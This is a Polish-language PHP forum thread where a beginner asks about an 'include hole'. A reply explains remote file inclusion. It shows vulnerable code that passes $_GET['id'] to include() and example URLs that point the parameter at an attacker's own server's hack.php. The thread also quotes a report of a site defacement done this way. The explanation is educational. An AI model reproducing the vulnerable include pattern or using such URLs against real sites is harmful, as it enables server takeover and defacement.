Witaj Gościu! ( Zaloguj | Rejestruj )

Forum PHP.pl

 
 Reply to this topicStart new topic
> include
kubatron
post
Post #1





Grupa: Zarejestrowani
Postów: 581
Pomógł: 0
Dołączył: 21.07.2003
Skąd: Jasło

Ostrzeżenie: (0%)
-----

czy ktoś wie jaka jest dziura w funkcji include ostatnio czytałem ze hakerzy dzieki odkrytej dziurze w funkcji include hakuja bez problemu stronki :?: :?: :?:
Go to the top of the page
+Quote Post
Wankster
post
Post #2





Grupa: Zarejestrowani
Postów: 208
Pomógł: 0
Dołączył: 19.04.2003

Ostrzeżenie: (0%)
-----

php Pro?
Gdzie to wyczytałeś (IMG:http://forum.php.pl/style_emoticons/default/biggrin.gif) :?: (IMG:http://forum.php.pl/style_emoticons/default/rolleyes.gif)
Go to the top of the page
+Quote Post
Seth
post
Post #3





Grupa: Przyjaciele php.pl
Postów: 2 335
Pomógł: 6
Dołączył: 7.03.2002

Ostrzeżenie: (0%)
-----

php Pro => php

Bledu w includzie nie ma. Jedyny blad jaki mozna wykorzystac to glupota lub niewiedza ludzi piszacych skrypt.
Przykladowo:
link do strony z artykulami wyglada tak www.example.pl/index.php?id=artykuly.php
A w glownym pliku mamy np tak:
[php:1:388bfe2a22]include( $_GET['id'] );[/php:1:388bfe2a22]
lub:
www.example.pl/index.php?id=artykuly
[php:1:388bfe2a22]include( $_GET['id'].".php" );[/php:1:388bfe2a22]

Teraz wystarczy dac np:
www.example.pl/index.php?id=http://www.naszserver.pl/hack.php
czy
www.example.pl/index.php?id=http://www.naszserver.pl/hack


P.S. kubatron: przeczytaj uwaznie regulamin i podpisy pod forami.
Go to the top of the page
+Quote Post
kubatron
post
Post #4





Grupa: Zarejestrowani
Postów: 581
Pomógł: 0
Dołączył: 21.07.2003
Skąd: Jasło

Ostrzeżenie: (0%)
-----

hacking.pl na tej stronie pisało to o schakowanej stronie dzięki dziurze w include funkcji nieklamie czytałem to i się zdiwiłem bo sie ucze teraz php
Go to the top of the page
+Quote Post
zalew
post
Post #5





Grupa: Zarejestrowani
Postów: 407
Pomógł: 0
Dołączył: 24.10.2002
Skąd: warszawa

Ostrzeżenie: (0%)
-----

wklejenie linku i cytatu przewyzsza twoje sily (IMG:http://forum.php.pl/style_emoticons/default/questionmark.gif) ?

edit:
searchem znalalzlem
http://www.hacking.pl/news.php?id=2567
Cytat
Grupa mY tEaM po raz kolejny wykorzystując dziurę w skryptach php podmieniła firmowy serwis internetowy. Jak mówią autorzy ataku: "Po raz kolejny okazuje się ze nieumiejętne używanie funkcji include w php może być niebezpieczne dla całego serwera".


czytaj uwaznie
Go to the top of the page
+Quote Post
« Następny starszy · PHP · Następny nowszy »
 

Reply to this topicStart new topic
2 Użytkowników czyta ten temat (2 Gości i 0 Anonimowych użytkowników)
0 Zarejestrowanych:

 

Tryb wyświetlania: Standardowy · Przełącz na: Linearny+ · Przełącz na: Drzewo

Śledź ten temat · Wyślij temat na e-mail · Wydrukuj ten temat · Subskrybuj to forum

RSS Aktualny czas: 23.08.2025 - 20:29
Powered By IP.Board © 2025  IPS, Inc.
All changes by PHP.pl Administrators
Hosting zapewnia NQ.pl hosting, trac, svn